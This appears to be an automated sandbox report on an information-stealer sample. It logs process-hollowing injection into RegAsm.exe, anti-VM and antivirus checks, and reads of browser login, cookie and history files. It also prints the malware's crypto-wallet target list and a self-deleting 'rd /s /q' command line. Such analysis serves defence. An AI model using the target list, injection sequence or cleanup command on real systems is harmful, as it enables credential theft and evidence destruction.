              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.9 %
              Source: C:\Windows\SysWOW64\timeout.exe TID: 5412Thread sleep count: 81 > 30Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h2_2_0040FCE5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00144493 FindFirstFileExW,0_2_00144493
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401162
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_004162AF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,2_2_004153F6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040B463
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_004094E5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040C679
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,2_2_00415AC2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_00409F72
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_00409900
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040A981
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,2_2_00415E66
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,2_2_00415843
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FE81 GetSystemInfo,wsprintfA,2_2_0040FE81
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
              Source: AKJDGI.2.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: AKJDGI.2.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: AKJDGI.2.drBinary or memory string: discord.comVMware20,11696487552f
              Source: AKJDGI.2.drBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: AKJDGI.2.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: AKJDGI.2.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: global block list test formVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: RegAsm.exe, 00000002.00000002.2468417703.0000000003415000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwarekW/
              Source: AKJDGI.2.drBinary or memory string: AMC password management pageVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: AKJDGI.2.drBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: AKJDGI.2.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: AKJDGI.2.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: AKJDGI.2.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: AKJDGI.2.drBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: AKJDGI.2.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: RegAsm.exe, 00000002.00000002.2468417703.0000000003415000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: AKJDGI.2.drBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: AKJDGI.2.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: AKJDGI.2.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: AKJDGI.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: AKJDGI.2.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: AKJDGI.2.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI call chain: ExitProcess graph end nodegraph_2-78746
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00138F06
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00417645
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0013C35D mov ecx, dword ptr fs:[00000030h]0_2_0013C35D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0014560E mov eax, dword ptr fs:[00000030h]0_2_0014560E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00147C0D GetProcessHeap,0_2_00147C0D
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00135102 SetUnhandledExceptionFilter,0_2_00135102
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00135237 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00135237
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00138F06 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00138F06
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134FA6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00134FA6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0041937F
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041E438 SetUnhandledExceptionFilter,2_2_0041E438
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0041A8A7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC6B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6CC6B66C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CC6B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CC6B1F7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CE1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CE1AC62

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7144, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C4018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,0_2_00C4018D
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111BE _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111BE
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 422000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 42E000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 641000
              Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: BF8008
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DBFCBGCGIJKJ" & exit
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134CCC cpuid 0_2_00134CCC
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_0013F01F
              Source: C:\Users\user\Desktop\file.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00147047
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_001478DC
              Source: C:\Users\user\Desktop\file.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_001479AB
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001472E9
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_00147334
              Source: C:\Users\user\Desktop\file.exeCode function: EnumSystemLocalesW,0_2_001473CF
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0014745A
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_0013F545
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,0_2_001476AD
              Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_001477D6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _EH_prolog,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,2_2_0040FCE5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00134EA0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00134EA0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FBCB GetProcessHeap,HeapAlloc,GetUserNameA,2_2_0040FBCB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040FC92 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,2_2_0040FC92
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

              Stealing of Sensitive Information

              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 7144, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Source: RegAsm.exe, 00000002.00000002.2467689392.0000000000EB0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Exodus Web3 Wallet
              Source: RegAsm.exe, 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: \\config\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.js
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqlite
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Binance\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
              Source: Yara match File source: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: sslproxydump.pcap, type: PCAP
              Source: Yara match File source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2051331641.0000000000157000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.2467689392.0000000000F37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: file.exe PID: 7144, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5768, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6CE20C40 sqlite3_bind_zeroblob,2_2_6CE20C40
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6CE20D60 sqlite3_bind_parameter_name,2_2_6CE20D60
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 2_2_6CD48EA0 sqlite3_clear_bindings,2_2_6CD48EA0
              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
